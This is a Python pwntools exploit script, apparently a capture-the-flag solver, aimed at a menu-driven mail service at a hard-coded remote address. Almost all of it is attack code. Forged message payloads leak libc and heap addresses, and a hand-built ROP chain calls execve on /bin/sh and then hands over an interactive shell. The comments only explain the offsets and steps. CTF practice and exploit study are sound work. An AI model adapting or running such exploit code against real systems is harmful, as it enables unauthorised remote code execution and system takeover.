#!/usr/bin/env python3
#Solver by parrot / Chance of success is 50%
from pwn import *
import time
def recvMenu():
    """Consume the service's menu banner from the global tube ``p``.

    Reads up to the first run of 18 '=' characters, then up to the next
    such run followed by a newline, so the tube is positioned right after
    the menu text. Received data is discarded.
    """
    bar = '=================='
    for tail in ('', '\n'):
        p.recvuntil(bar + tail)
def createAcc(uname):
    """Select menu option '0' and send *uname* at the prompt that ends in '='.

    The menu banner is consumed first via ``recvMenu``; all I/O goes through
    the global tube ``p``.
    """
    choice = '0'
    prompt = '=\n'
    recvMenu()
    p.sendline(choice)
    p.sendlineafter(prompt, uname)
def login(uname):
    """Select menu option '1' and send *uname* at the prompt that ends in '='.

    The menu banner is consumed first via ``recvMenu``; all I/O goes through
    the global tube ``p``.
    """
    choice = '1'
    prompt = '=\n'
    recvMenu()
    p.sendline(choice)
    p.sendlineafter(prompt, uname)
def sendMsg(who, msg, z=True):
    """Select menu option '2', then answer the next two prompts with *msg* and *who*.

    Args:
        who: value sent at the second prompt ending in '='.
        msg: value sent at the first prompt ending in '='.
        z: when true, consume the menu banner via ``recvMenu`` before choosing
           the option; pass False if the caller has already consumed it.

    Sleeps 0.2 s after sending, presumably to give the service time to
    process the input before the next interaction.
    """
    if z:
        recvMenu()
    p.sendline('2')
    for answer in (msg, who):
        p.sendlineafter('=\n', answer)
    time.sleep(0.2)
def delMsg(idx):
    """Select menu option '4' and send ``str(idx)`` at the prompt that ends in '='.

    The menu banner is consumed first via ``recvMenu``; all I/O goes through
    the global tube ``p``.
    """
    choice = '4'
    prompt = '=\n'
    recvMenu()
    p.sendline(choice)
    p.sendlineafter(prompt, str(idx))
def inbox(idx):
    """Select menu option '3' and send ``str(idx)`` once the prompt ending in '=' arrives.

    Written with ``sendlineafter`` like the other helpers; it waits for the
    delimiter and then sends the line, which is what the explicit
    ``recvuntil`` + ``sendline`` pair does.
    """
    choice = '3'
    prompt = '=\n'
    recvMenu()
    p.sendline(choice)
    p.sendlineafter(prompt, str(idx))
# p = process('./a.out',aslr=False)
# p = process('./mail',env={'LD_LIBRARY_PATH':'./libs'})
# Interaction driver. Everything below is a fixed, order-dependent script of
# menu inputs over the tube: each step waits for the service's prompts, so
# nothing here can be reordered. The numeric constants and offsets are
# hard-coded for one specific binary/libc build and are not expected to
# work against any other build (the header comment at the top of the file
# notes that even on the intended build the run succeeds only about half
# the time).
p = remote('34.146.156.91',10004)
#######################
createAcc('a')
login('a')
# NOTE(review): this value of c is never sent; the sendMsg call below builds
# its own payload and c is reassigned later without being read.
c = p64(0xdeedbeefdeedbeef) #vtable
c+= p64(0xdeedbeef) #msgaddr
c+= p64(0x1337) #msgsize
c+= p64(0xdeedbeef) #namepointer
sendMsg('a',p64(0xdeedbeefdeedbeef)+p64(0x0000000000608028)+p64(0x8)+p64(0x404dd6))
# sendMsg('a',p64(0xdeedbeefdeedbeef)+p64(0x000055555555ff70)+p64(0x16)+p64(0x15555549734e))
sendMsg('a','lqmao')
sendMsg('a','lmao')
sendMsg('a','lmao')
sendMsg('a','lmao')
sendMsg('a','lmao')
inbox(0)
recvMenu()
# Several menu answers are batched into a single write (str data; the tube
# is expected to encode it), followed by a 0.5 s sleep and one more send.
# The same batched sequence is repeated twice more below with different
# filler bytes; only the leak read after it differs.
c = '0\n'
c+= 'A'*0x400+'\n'
c+= '2\n'
c+= 'A'*0x90+'\n'
c+= 'a\n'
c+= '2\n'
c+= 'Q'*0x430+'\n'
p.send(c)
time.sleep(0.5)
p.send('AAAAAAAAA\n')
p.sendline('3\n6\n')
p.recvuntil('Inbox message\n')
# Interpret the bytes printed after 'Inbox message' as a little-endian
# integer; the last two received bytes (the '=' delimiter and the byte
# before it) are dropped. The subtracted constant is a fixed offset for the
# targeted libc build, so libcbase is only meaningful on that build.
libcbase = int.from_bytes(p.recvuntil('=')[:-2],byteorder='little') - 1108016
print(hex(libcbase))
############################
sendMsg('a',p64(0xdeedbeefdeedbeef)+p64(libcbase+0x1ecbe0)+p64(0x8)+p64(0x404dd6),False)
# sendMsg('a',p64(0xdeedbeefdeedbeef)+p64(0x000055555555ff70)+p64(0x16)+p64(0x15555549734e),False)
inbox(7)
recvMenu()
c = '0\n'
c+= 'A'*0x400+'\n'
c+= '2\n'
c+= 'Z'*0x90+'\n'
c+= 'a\n'
c+= '2\n'
c+= 'Q'*0x430+'\n'
p.send(c)
time.sleep(0.5)
p.send('AAAAAAAAA\n')
inbox(8)
p.recvuntil('Inbox message\n')
# Same parsing as for libcbase, but with no offset subtracted.
heapleak = int.from_bytes(p.recvuntil('=')[:-2],byteorder='little')
print(hex(heapleak))
# 'id' padded with NUL bytes to 8 bytes, followed by one libc-relative value.
c = b'id'.ljust(0x8,b'\x00')
c+= p64(libcbase+0x54f8d)
sendMsg('a',c,False)
############################
# sendMsg('a',p64(0x555555575900)+p64(0)+p64(0)+p64(0x15555549734e),False)
sendMsg('a',p64(heapleak+64)+p64(heapleak+64)+p64(0x8)+p64(0x404dd6),False)
inbox(10)
recvMenu()
c = '0\n'
c+= 'A'*0x400+'\n'
c+= '2\n'
c+= 'A'*0x90+'\n'
c+= 'a\n'
c+= '2\n'
c+= 'Q'*0x430+'\n'
p.send(c)
time.sleep(0.5)
# NOTE(review): this send is 8 'A's as bytes, whereas the two earlier ones
# are 9 'A's as str; cannot tell from here whether the difference is
# intentional.
p.send(b'AAAAAAAA\n')
# Final payload: fixed values plus addresses derived from the two leaks
# above, ending in three NUL-terminated strings.
c = p64(0xdeedbeefdeedbeef)*2
c+= p64(heapleak+0xdd8)
c+= p64(libcbase+0x000000000015f7e6)
c+= p64(0x13371337)
###############
c+= p64(libcbase+0x0000000000023b72) # pop rdi
c+= p64(heapleak+0xe28+0x20)
c+= p64(libcbase+0x000000000002604f) # pop rsi
c+= p64(heapleak+0xe28)
c+= p64(libcbase+0x0000000000119241)
c+= p64(0)
c+= p64(0)
c+= p64(libcbase+0x00000000000e31a0)
c+= p64(heapleak+0xe28+0x20)
c+= p64(heapleak+0xe28+0x20+0x8)
c+= p64(heapleak+0xe28+0x20+0x10)
c+= p64(0)
# execve -> 00000000000e31a0
c+= b'/bin/sh\x00'
c+= b'-c\x00\x00\x00\x00\x00\x00'
c+= b'/bin/sh\x00'
sendMsg('a',c,False)
print(hex(libcbase+0x00000000000e31a0))
# Blocks until Enter is pressed on stdin (presumably a manual checkpoint,
# e.g. to attach a debugger) before the last two menu actions.
input()
inbox(11)
delMsg(11)
p.interactive()
# createAcc('lmaook13377777777777777777777777')
#
# delMsg(4)
# delMsg(0)